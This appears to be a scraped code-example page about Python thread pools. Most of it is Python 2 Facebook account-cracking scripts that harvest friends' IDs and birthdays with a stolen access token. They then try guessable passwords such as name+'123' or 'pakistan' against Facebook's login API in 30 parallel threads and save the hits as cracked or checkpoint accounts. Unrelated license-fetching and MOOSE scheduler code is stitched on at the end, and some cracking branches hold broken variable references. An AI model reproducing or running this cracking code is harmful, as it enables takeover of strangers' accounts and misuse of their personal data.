        idt = raw_input(' Put Id/user : '******'https://graph.facebook.com/' + idt + '?access_token=' + token, headers=header)
            q = json.loads(r.text)
            print ' Target user : '******'name']
        except KeyError:
            print '\t    \x1b[1;31mID Not Found\x1b[0;97m'
            raw_input('\nPress enter to back ')
            dob_select()

        r = requests.get('https://graph.facebook.com/' + idt + '/subscribers?access_token=' + token + '&limit=5000', headers=header)
        z = json.loads(r.text)
        for i in z['data']:
            uid = i['id']
            na = i['name']
            nm = na.rsplit(' ')[0]
            id.append(uid + '|' + nm)

    elif select == '3':
        dob()
    elif select == '4':
        b_menu()
    else:
        print ''
        print '\t    \x1b[1;31mSelect valid option\x1b[0;97m'
        print ''
        dob_select()
    print ' Total IDs : ' + str(len(id))
    print ' The Process has started'
    print ' Note : This is for testing only'
    print ''
    print 47 * '-'
    print ''

    def main(arg):
        user = arg
        uid, name = user.split('|')
        try:
            q = requests.get('https://graph.facebook.com/' + uid + '?access_token=' + token, headers=header).text
            d = json.loads(q)
            y = d['birthday']
            print '\x1b[1;32m ' + uid + ' \x1b[1;30m ' + name + ' | ' + y + '\x1b[0;97m'
            nmb = open('dobs.txt', 'a')
            nmb.write(name + ' | ' + uid + ' | ' + y + '\n')
            nmb.close()
            nms.append(number)
        except:
            pass

    p = ThreadPool(30)
    p.map(main, id)
    print ''
    print 47 * '-'
    print ''
    print ' Process has completed'
    print ' Total DOB :  ' + str(len(nms))
    print ''
    print 47 * '-'
    print ''
    raw_input('\n Press enter to back ')
    extract_dob()
def pilih_super():
	peak = raw_input("\n\033[1;31;40m➣➣ \033[1;97m")
	if peak =="":
		print "\033[1;39mFill in correctly"
		pilih_super()
	elif peak =="1":
		os.system('clear')
		print logo

		jalan('\033[0;39m[•] Getting IDs \033[0;39m...')
		r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
		z = json.loads(r.text)
		for s in z['data']:
			id.append(s['id'])

	elif peak =="2":
		os.system('clear')
		print logo
		idt = raw_input("\033[0;39m* Enter ID : ")
		try:
			jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
			op = json.loads(jok.text)
			print"\033[0;31;39m[•] Name : "+op["name"]
		except KeyError:
			print"\033[0;39m[•] ID Not Found!"
			raw_input("\n\033[0;39m[\033[0;39mBack\033[0;39m]")
			super()
		print"\033[0;39;40m[•] Getting IDs..."
		r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
		z = json.loads(r.text)
		for i in z['data']:
			id.append(i['id'])
	elif peak =="3":
		os.system('clear')
		print logo
		brute()	
	elif peak =="4":
		os.system('clear')
		print logo                  
		try:
			idlist = raw_input('\033[0;39m[+] \033[0;39mEnter the file name \033[0;39m: \033[0;39m')
			for line in open(idlist,'r').readlines():
				id.append(line.strip())
		except IOError:
			print '\x1b[0;35;39[!] \x1b[0;35;39File not found'
			raw_input('\n\x1b[0;35;39[ \x1b[0;35;39Exit \x1b[0;35;39]')
			super()
	elif peak =="0":
		menu()
	else:
		print "\033[0;39mFill in correctly"
		pilih_super()

	
	print "\033[0;39;40m[•] Total IDs : \033[0;97m"+str(len(id))
	jalan('\033[0;39;40m[•] Please Wait...')
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r\033[0;39;40m[•] Cloning\033[0;97m"+o),;sys.stdout.flush();time.sleep(1)
	print "\n\033[0;39m ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
	print "\033[0;39m Wait Cracking Is Pending"
	print "\033[0;39m ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"

	def main(arg):
		global cekpoint,oks
		user = arg
		try:
			os.mkdir('out')
		except OSError:
			pass 
		try:
			a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
			b = json.loads(a.text)
			pass1 = b['first_name'] + b['last_name']
			data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
			q = json.load(data)
			if 'access_token' in q:
				print '\033[0;92m[OK] \033[0;39m ' + user  + ' \033[0;39m | \033[0;39m ' + pass1 + '\033[0;39m | \033[0;39m' + b['name']
				oks.append(user+pass1)
			else:
				if 'www.facebook.com' in q["error_msg"]:
					print '\x1b[0;36;39[CP] \033[0;39m ' + user  + ' \x1b[0;36;39|\033[0;39m ' + pass1 + '\033[0;39m | \033[0;39m' + b['name']
					cek = open("out/CP.txt", "a")
					cek.write(user+"|"+pass1+"\n")
					cek.close()
					cekpoint.append(user+pass1)
				else:
					pass2 = b['first_name'] + '123'
					data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
					q = json.load(data)
					if 'access_token' in q:
						print '\033[0;91m[OK] \033[0;39m ' + user  + ' \033[0;39m | \033[0;39m ' + pass2 + '\033[0;39m | \033[0;39m' + b['name']
						oks.append(user+pass2)
					else:
						if 'www.facebook.com' in q["error_msg"]:
							print '\x1b[0;36;39[CP] \033[0;39m ' + user  + ' \x1b[0;36;39|\033[0;39m ' + pass2 + '\033[0;39m | \033[0;39m' + b['name']
							cek = open("out/CP.txt", "a")
							cek.write(user+"|"+pass2+"\n")
							cek.close()
							cekpoint.append(user+pass2)
						else:
							pass3 = b['first_name'] + '12345'
							data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
							q = json.load(data)
							if 'access_token' in q:
								print '\033[0;92m[OK] \033[0;39m ' + user  + ' \033[0;39m | \033[0;39m ' + pass3 + '\033[0;39m | \033[0;39m' + b['name']
								oks.append(user+pass3)
							else:
								if 'www.facebook.com' in q["error_msg"]:
									print '\x1b[0;91;39[CP] \033[0;39m ' + user  + ' \x1b[0;36;39|\033[0;39m ' + pass3 + '\033[0;39m | \033[0;39m' + b['name']
									cek = open("out/CP.txt", "a")
									cek.write(user+"|"+pass3+"\n")
									cek.close()
									cekpoint.append(user+pass4)
								else:
									pass4 = b['first_name'] + '1234'
									data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
									q = json.load(data)
									if 'access_token' in q:
										print '\033[0;92m[OK] \033[0;39m ' + user  + ' \033[0;39m | \033[0;39m ' + pass4 + '\033[0;39m | \033[0;39m' + b['name']
										oks.append(user+pass4)
									else:
										if 'www.facebook.com' in q["error_msg"]:
											print '\x1b[0;91;39[CP] \033[0;39m ' + user  + ' \x1b[0;36;39|\033[0;39m ' + pass4 + '\033[0;39m | \033[0;39m' + b['name']
											cek = open("out/CP.txt", "a")
											cek.write(user+"|"+pass4+"\n")
											cek.close()
											cekpoint.append(user+pass4)
										else:
											pass5 = '786786'
											data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
											q = json.load(data)
											if 'access_token' in q:
												print '\033[0;92m[OK] \033[0;39m ' + user  + ' \x1b[0;36;39|\033[0;39m ' + pass5 + '\033[0;39m | \033[0;39m' + b['name']
												oks.append(user+pass5)
											else:
												if 'www.facebook.com' in q["error_msg"]:
													print '\x1b[0;91;39[CP] \033[0;39m ' + user  + ' \x1b[0;36;39|\033[0;39m ' + pass5 + '\033[0;39m | \033[0;39m' + b['name']
													cek = open("out/CP.txt", "a")
													cek.write(user+"|"+pass5+"\n")
													cek.close()
													cekpoint.append(user+pass5)
												else:
													pass6 = b['last_name'] + '123'
													data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
													q = json.load(data)
													if 'access_token' in q:
														print '\033[0;92m[OK] \033[0;39m ' + user  + ' \x1b[0;36;39|\033[0;39m ' + pass6 + '\033[0;39m | \033[0;39m' + b['name']
														oks.append(user+pass6)
													else:
														if 'www.facebook.com' in q["error_msg"]:
															print '\x1b[0;91;39[CP] \033[0;39m ' + user  + ' \x1b[0;36;39|\033[0;39m ' + pass6 + '\033[0;39m | \033[0;39m' + b['name']
															cek = open("out/CP.txt", "a")
															cek.write(user+"|"+pass6+"\n")
															cek.close()
															cekpoint.append(user+pass6)
														else:
															pass7 = 'pakistan'
															data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
															q = json.load(data)
															if 'access_token' in q:
																print '\033[0;92m[OK] \033[0;39m ' + user  + ' \x1b[0;36;39|\033[0;39m ' + pass7 + '\033[0;39m | \033[0;39m' + b['name']
																oks.append(user+pass7)
															else:
																if 'www.facebook.com' in q["error_msg"]:
																	print '\x1b[0;91;39[CP] \033[0;39m ' + user  + ' \x1b[0;36;39|\033[0;39m ' + pass7 + '\033[0;39m | \033[0;39m' + b['name']
																	cek = open("out/CP.txt", "a")
																	cek.write(user+"|"+pass7+"\n")
																	cek.close()
																	cekpoint.append(user+pass7)
																else:
																	pass8 = b['last_name'] + '786'
																	data = urllib.urlopen("https://b-api.facebook.com/methode/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f522ef6")
																	q = json.load(data)
																	if 'access_token' in q:
																		print '\033[0;92m[OK] \033[0;39m '+ user + ' \x1b[0;36;39|\033[0;39m ' + pass8 + '\033[0;39m | \033[0;39m' + b['name']
																		oks.append(user+pass8)
																	else:
																		if 'www.facebook.com' in q["error_msg"]:
																			print '\x1b[0;91;39[CP] \033[0;39m ' + user + '\x1b[0;36;39|\033[0;39m ' + pass8 + '\033[0;39m | \033[0;39m' + b['name']
																			cek = open("out/CP.txt", "a")
																			cek.close()
																			cekpoint.append(user+pass8)
																	
		except:																		
			pass
		
	p = ThreadPool(30)
	p.map(main, id) 
	
	print '\033[0;39;40m[•] Process Has Been Completed\033[0;39m....'
	print "\033[0;39;40m[+] Total OK/\033[0;97mCP \033[0;39m: \033[0;39m"+str(len(oks))+"\033[0;39;40m/\033[0;39;40m"+str(len(cekpoint))
	print '\033[0;39;40m[+] CP File Has Been Saved : save/cp.txt'
	print """
\033[0;30;39───────────────────────────────────────────
           """
	raw_input("\n\033[0;39m[\033[0;39mExit\033[0;39m]")
	os.system('python2 a')
Exemple #42
0
def pilih_super():
    peak = raw_input("\n\033[1;97mChoose an Option>>> \033[1;97m")
    if peak == "":
        print "\x1b[1;91mFill in correctly"
        pilih_super()
    elif peak == "1":
        os.system('clear')
        print logo
        print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mUsmanTech\033[1;95m♡──────────•◈•──────────♡"
        jalan('\033[1;93mGetting IDs \033[1;97m...')
        r = requests.get(
            "https://graph.facebook.com/me/friends?access_token=" + toket)
        z = json.loads(r.text)
        for s in z['data']:
            id.append(s['id'])
    elif peak == "2":
        os.system('clear')
        print logo
        idt = raw_input(
            "\033[1;96m[♡] \033[1;92mEnter ID\033[1;93m: \033[1;97m")
        print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mUsmanTech\033[1;95m♡──────────•◈•──────────╯♡"
        try:
            jok = requests.get("https://graph.facebook.com/" + idt +
                               "?access_token=" + toket)
            op = json.loads(jok.text)
            print "\033[1;93mName\033[1;93m:\033[1;97m " + op["name"]
        except KeyError:
            print "\x1b[1;92mID Not Found!"
            raw_input("\n\033[1;96m[\033[1;94mUsman\033[1;96m]")
            super()
        print "\033[1;93mGetting IDs\033[1;93m..."
        r = requests.get("https://graph.facebook.com/" + idt +
                         "/friends?access_token=" + toket)
        z = json.loads(r.text)
        for i in z['data']:
            id.append(i['id'])
    elif peak == "0":
        menu()
    else:
        print "\x1b[1;91mFill in correctly"
        pilih_super()

    print "\033[1;91mTotal IDs\033[1;93m: \033[1;94m" + str(len(id))
    jalan('\033[1;92mPlease Wait\033[1;93m...')
    titik = ['.   ', '..  ', '... ']
    for o in titik:
        print("\r\033[1;91mCloning\033[1;93m" + o),
        sys.stdout.flush()
        time.sleep(1)
    print "\n\033[1;94m«-----\x1b[1;93m♡To Stop Process Press CTRL+Z♡\033[1;94m----»"
    print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mUsmanTech\033[1;95m♡──────────•◈•──────────♡"
    jalan(' \033[1;93m ........Cloning Start plzzz Wait.......... ')
    print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mUsmanTech\033[1;95m♡──────────•◈•──────────♡"

    def main(arg):
        global cekpoint, oks
        user = arg
        try:
            os.mkdir('out')
        except OSError:
            pass
        try:
            a = requests.get('https://graph.facebook.com/' + user +
                             '/?access_token=' + toket)
            b = json.loads(a.text)
            pass1 = ('786786')
            data = urllib.urlopen(
                "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
            )
            q = json.load(data)
            if 'access_token' in q:
                print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;92m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass1
                oks.append(user + pass1)
            else:
                if 'www.facebook.com' in q["error_msg"]:
                    print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass1
                    cek = open("out/checkpoint.txt", "a")
                    cek.write(user + "|" + pass1 + "\n")
                    cek.close()
                    cekpoint.append(user + pass1)
                else:
                    pass2 = 'Pakistan'
                    data = urllib.urlopen(
                        "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                        + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                    )
                    q = json.load(data)
                    if 'access_token' in q:
                        print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass2
                        oks.append(user + pass2)
                    else:
                        if 'www.facebook.com' in q["error_msg"]:
                            print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass2
                            cek = open("out/checkpoint.txt", "a")
                            cek.write(user + "|" + pass2 + "\n")
                            cek.close()
                            cekpoint.append(user + pass2)
                        else:
                            pass3 = a['first_name'] + '123'
                            data = urllib.urlopen(
                                "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                            )
                            q = json.load(data)
                            if 'access_token' in q:
                                print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass3
                                oks.append(user + pass3)
                            else:
                                if 'www.facebook.com' in q["error_msg"]:
                                    print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass3
                                    cek = open("out/checkpoint.txt", "a")
                                    cek.write(user + "|" + pass3 + "\n")
                                    cek.close()
                                    cekpoint.append(user + pass3)
                                else:
                                    pass4 = b['first_name'] + '@#$&'
                                    data = urllib.urlopen(
                                        "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                        + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                                    )
                                    q = json.load(data)
                                    if 'access_token' in q:
                                        print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass4
                                        oks.append(user + pass4)
                                    else:
                                        if 'www.facebook.com' in q[
                                                "error_msg"]:
                                            print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass4
                                            cek = open("out/checkpoint.txt",
                                                       "a")
                                            cek.write(user + "|" + pass4 +
                                                      "\n")
                                            cek.close()
                                            cekpoint.append(user + pass4)
                                        else:
                                            pass5 = b['last_name'] + '12345'
                                            data = urllib.urlopen(
                                                "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                                + (user) +
                                                "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                                            )
                                            q = json.load(data)
                                            if 'access_token' in q:
                                                print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass5
                                                oks.append(user + pass5)
                                            else:
                                                if 'www.facebook.com' in q[
                                                        "error_msg"]:
                                                    print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass5
                                                    cek = open(
                                                        "out/checkpoint.txt",
                                                        "a")
                                                    cek.write(user + "|" +
                                                              pass5 + "\n")
                                                    cek.close()
                                                    cekpoint.append(user +
                                                                    pass5)
                                                else:
                                                    pass6 = b[
                                                        'last123_name'] + 'khan'
                                                    data = urllib.urlopen(
                                                        "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                                        + (user) +
                                                        "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                                                    )
                                                    q = json.load(data)
                                                    if 'access_token' in q:
                                                        print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass6
                                                        oks.append(user +
                                                                   pass6)
                                                    else:
                                                        if 'www.facebook.com' in q[
                                                                "error_msg"]:
                                                            print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass6
                                                            cek = open(
                                                                "out/checkpoint.txt",
                                                                "a")
                                                            cek.write(user +
                                                                      "|" +
                                                                      pass6 +
                                                                      "\n")
                                                            cek.close()
                                                            cekpoint.append(
                                                                user + pass6)
                                                        else:
                                                            a = requests.get(
                                                                'https://graph.facebook.com/'
                                                                + user +
                                                                '/?access_token='
                                                                + toket)
                                                            b = json.loads(
                                                                a.text)
                                                            pass7 = b[
                                                                'first_name'] + 'afridi'
                                                            data = urllib.urlopen(
                                                                "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                                                + (user) +
                                                                "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                                                            )
                                                            q = json.load(data)
                                                            if 'access_token' in q:
                                                                print '\x1b[1;92mSuccessful\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass7
                                                                oks.append(
                                                                    user +
                                                                    pass7)
                                                            else:
                                                                if 'www.facebook.com' in q[
                                                                        "error_msg"]:
                                                                    print '\x1b[1;95mCheckpoint\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass7
                                                                    cek = open(
                                                                        "out/checkpoint.txt",
                                                                        "a")
                                                                    cek.write(
                                                                        user +
                                                                        "|" +
                                                                        pass7 +
                                                                        "\n")
                                                                    cek.close()
                                                                    cekpoint.append(
                                                                        user +
                                                                        pass7)

        except:
            pass

    p = ThreadPool(30)
    p.map(main, id)
    print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mUsmanTech\033[1;95m♡──────────•◈•──────────♡"
    print "  \033[1;93m«---•◈•---Mode By Usman Tech---•◈•---»"
    print '\033[1;91mProcess Has Been Completed\033[1;92m....'
    print "\033[1;91mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;91m" + str(
        len(oks)) + "\033[1;97m/\033[1;95m" + str(len(cekpoint))
    print """
             
             ...........███ ]▄▄▄▄▄▃
             ..▂▄▅█████▅▄▃▂
             [███████████████]
             ◥⊙▲⊙▲⊙▲⊙▲⊙▲⊙◤
♡──────────────•◈•──────────────♡.
: \033[1;96m .....Usman Khan  Usman Tech........... \033[1;93m :
♡──────────────•◈•──────────────♡.' 
                whatsapp Num
               +923134572306"""

    raw_input("\n\033[1;92m[\033[1;94mBack\033[1;96m]")
    menu()
    with open(dep_url_yaml) as file:
        dep_config = yaml.full_load(file)

    maven_url_temp = 'https://repo1.maven.org/maven2/{module}/{version}'

    csv_list = []
    no_licenses = []
    no_license_type = []
    incorrect_source_url = []

    logging.info(
        'Pulling license for {num_deps} dependencies using {num_threads} threads.'
        .format(num_deps=len(dependencies['dependencies']),
                num_threads=THREADS))
    thread_lock = threading.Lock()
    pool = ThreadPool(THREADS)
    pool.map(execute, dependencies['dependencies'])

    write_to_csv(csv_list)

    error_msg = []
    run_status = 'succeed'
    if no_licenses:
        logging.error(no_licenses)
        how_to = '**************************************** ' \
                 'Licenses were not able to be pulled ' \
                 'automatically for some dependencies. Please search source ' \
                 'code of the dependencies on the internet and add "license" ' \
                 'and "notice" (if available) field to {yaml_file} for each ' \
                 'missing license. Dependency List: [{dep_list}]'.format(
            dep_list=','.join(sorted(no_licenses)), yaml_file=dep_url_yaml)
Exemple #44
0
class Scheduler(MooseObject):
    """
    Base class for handling jobs asynchronously. To use this class, call .schedule()
    and supply a list of testers to schedule. Each group of testers supplied will begin
    running immediately.

    Syntax:
       .schedule([list of tester objects])

    A list of testers will be added to a queue and begin calling their derived run method.
    You can continue to add more testers to the queue in this fashion.

    Once all jobs have been scheduled, call .waitFinish() to wait until all jobs have
    finished.
    """

    @staticmethod
    def validParams():
        params = MooseObject.validParams()
        params.addRequiredParam('average_load',  64.0, "Average load to allow")
        params.addRequiredParam('max_processes', None, "Hard limit of maxium processes to use")
        params.addParam('min_reported_time', 10, "The minimum time elapsed before a job is reported as taking to long to run.")

        return params

    # This is what will be checked for when we look for valid schedulers
    IS_SCHEDULER = True

    def __init__(self, harness, params):
        MooseObject.__init__(self, harness, params)

        ## The test harness to run callbacks on
        self.harness = harness

        # Retrieve and store the TestHarness options for use in this object
        self.options = harness.getOptions()

        # The Scheduler class can be initialized with no "max_processes" argument and it'll default
        # to a soft limit. If however a max_processes is passed we'll treat it as a hard limit.
        # The difference is whether or not we allow single jobs to exceed the number of slots.
        if params['max_processes'] == None:
            self.available_slots = 1
            self.soft_limit = True
        else:
            self.available_slots = params['max_processes'] # hard limit
            self.soft_limit = False

        self.average_load = params['average_load']

        self.min_report_time = params['min_reported_time']

        # Initialize run_pool based on available slots
        self.run_pool = ThreadPool(processes=self.available_slots)

        # Initialize status_pool to only use 1 process (to prevent status messages from getting clobbered)
        self.status_pool = ThreadPool(processes=1)

        # Slot lock when processing resource allocations and modifying slots_in_use
        self.slot_lock = threading.Lock()

        # Job lock when modifying a jobs status
        self.activity_lock = threading.Lock()

        # Job count lock when modifying incoming/outgoing jobs
        self.job_count_lock = threading.Lock()

        # A combination of processors + threads (-j/-n) currently in use, that a job requires
        self.slots_in_use = 0

        # Count of jobs which need to complete
        self.job_count = 0

        # Set containing all submitted jobs
        self.__job_bank = set([])

        # Total running Job and Test failures encountered
        self.__failures = 0

        # Allow threads to set a global exception
        self.__error_state = False

        # Private set of jobs currently running
        self.__active_jobs = set([])

        # Jobs that are taking longer to finish than the alloted time are reported back early to inform
        # the user 'stuff' is still running. Jobs entering this set will not be reported again.
        self.jobs_reported = set([])

        # The last time the scheduler reported something
        self.last_reported_time = clock()

        # Sets of threading objects created by jobs entering and exiting the queues. When scheduler.waitFinish()
        # is called, and both thread pools are empty, the pools shut down, and the call to waitFinish() returns.
        self.__status_pool_lock = threading.Lock()
        self.__runner_pool_lock = threading.Lock()
        self.__status_pool_jobs = set([])
        self.__runner_pool_jobs = set([])

        # True when scheduler.waitFinish() is called. This alerts the scheduler, no more jobs are
        # to be scheduled. KeyboardInterrupts are then handled by the thread pools.
        self.__waiting = False

    def triggerErrorState(self):
        self.__error_state = True
        self.run_pool.close()
        self.status_pool.close()

    def killRemaining(self, keyboard=False):
        """ Method to kill running jobs """
        with self.activity_lock:
            for job in self.__active_jobs:
                job.killProcess()
        if keyboard:
            self.triggerErrorState()
            self.harness.keyboard_interrupt()
        else:
            self.triggerErrorState()

    def retrieveJobs(self):
        """ return all the jobs the scheduler was tasked to perform work for """
        return self.__job_bank

    def schedulerError(self):
        """ boolean if the scheduler prematurely exited """
        return self.__error_state and not self.maxFailures()

    def maxFailures(self):
        """ Boolean for hitting max failures """
        return ((self.options.valgrind_mode and self.__failures >= self.options.valgrind_max_fails)
                or self.__failures >= self.options.max_fails)

    def run(self, job):
        """ Call derived run method """
        return

    def notifyFinishedSchedulers(self):
        """ Notify derived schedulers we are finished """
        return

    def augmentJobs(self, Jobs):
        """
        Allow derived schedulers to augment Jobs before they perform work.
        Note: This occurs before we perform a job count sanity check. So
        any additions or subtractions to the number of jobs will result in
        an exception.
        """
        return

    def waitFinish(self):
        """
        Inform the Scheduler there are no further jobs to schedule.
        Return once all jobs have completed.
        """
        self.__waiting = True
        try:
            # wait until there is an error, or if all the queus are empty
            waiting_on_status_pool = True
            waiting_on_runner_pool = True

            while (waiting_on_status_pool or waiting_on_runner_pool) and self.job_count:

                if self.__error_state:
                    break

                with self.__status_pool_lock:
                    waiting_on_status_pool = sum(1 for x in self.__status_pool_jobs if not x.ready())
                with self.__runner_pool_lock:
                    waiting_on_runner_pool = sum(1 for x in self.__runner_pool_jobs if not x.ready())

                sleep(0.1)

            # Reporting sanity check
            if not self.__error_state and self.job_count:
                raise SchedulerError('Scheduler exiting with different amount of work than what was tasked!')

            if not self.__error_state:
                self.run_pool.close()
                self.run_pool.join()
                self.status_pool.close()
                self.status_pool.join()

            # allow derived schedulers to perform any exit routines
            self.notifyFinishedSchedulers()

        except KeyboardInterrupt:
            self.killRemaining(keyboard=True)

    def schedule(self, testers):
        """
        Generate and submit a group of testers to a thread pool queue for execution.
        """
        # If we are not to schedule any more jobs for some reason, return now
        if self.__error_state:
            return

        # Instance our job DAG, create jobs, and a private lock for this group of jobs (testers)
        Jobs = JobDAG(self.options)
        j_dag = Jobs.createJobs(testers)
        j_lock = threading.Lock()

        # Allow derived schedulers access to the jobs before they launch
        self.augmentJobs(Jobs)

        # job-count to tester-count sanity check
        if j_dag.size() != len(testers):
            raise SchedulerError('Scheduler was going to run a different amount of testers than what was received (something bad happened)!')

        # Final reporting job-count sanity check
        with self.job_count_lock:
            self.job_count += j_dag.size()

        # Store all processed jobs in the global job bank
        self.__job_bank.update(j_dag.topological_sort())

        # Launch these jobs to perform work
        self.queueJobs(Jobs, j_lock)

    def queueJobs(self, Jobs, j_lock):
        """
        Determine which queue jobs should enter. Finished jobs are placed in the status
        pool to be printed while all others are placed in the runner pool to perform work.

        A finished job will trigger a change to the Job DAG, which will allow additional
        jobs to become available and ready to enter the runner pool (dependency jobs).
        """
        with j_lock:
            concurrent_jobs = Jobs.getJobsAndAdvance()
            for job in concurrent_jobs:
                if job.isFinished():
                    if not self.status_pool._state:
                        with self.__status_pool_lock:
                            self.__status_pool_jobs.add(self.status_pool.apply_async(self.jobStatus, (job, Jobs, j_lock)))

                elif job.isHold():
                    if not self.run_pool._state:
                        with self.__runner_pool_lock:
                            job.setStatus(job.queued)
                            self.__runner_pool_jobs.add(self.run_pool.apply_async(self.runJob, (job, Jobs, j_lock)))

    def getLoad(self):
        """ Method to return current load average """
        loadAverage = 0.0
        try:
            loadAverage = os.getloadavg()[0]
        except AttributeError:
            pass      # getloadavg() not available in this implementation of os
        return loadAverage

    def satisfyLoad(self):
        """ Method for controlling load average """
        while self.slots_in_use > 1 and self.getLoad() >= self.average_load:
            sleep(1.0)

    def reserveSlots(self, job, j_lock):
        """
        Method which allocates resources to perform the job. Returns bool if job
        should be allowed to run based on available resources.
        """
        # comply with load average
        if self.options.load:
            self.satisfyLoad()

        with self.slot_lock:
            can_run = False
